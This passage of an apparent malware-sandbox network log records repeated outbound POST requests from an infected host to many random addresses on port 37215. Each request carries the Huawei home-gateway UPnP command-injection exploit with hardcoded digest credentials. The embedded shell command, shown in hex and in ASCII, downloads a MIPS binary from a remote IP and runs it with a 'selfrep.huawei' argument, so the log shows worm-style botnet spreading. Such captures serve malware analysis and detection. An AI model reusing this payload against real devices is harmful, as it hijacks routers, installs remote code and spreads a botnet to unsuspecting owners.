2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1803192.168.2.134819464.97.127.8037215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:22.631778955 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1804192.168.2.136019041.162.255.15137215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:22.631783009 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1805192.168.2.1343710157.181.217.12037215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:22.631835938 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1806192.168.2.1341840197.131.198.1037215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:22.631937027 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1807192.168.2.1360324157.82.46.25037215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:22.632083893 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1808192.168.2.1351218157.48.162.22937215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:22.636229992 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1809192.168.2.134115264.93.4.11937215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:22.636246920 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1810192.168.2.1344812157.132.153.19837215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:22.638844013 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1811192.168.2.1352506197.26.30.8937215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:22.638871908 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1812192.168.2.1346076157.109.195.20137215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:22.638923883 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1813192.168.2.135310841.235.82.1537215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:22.638932943 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
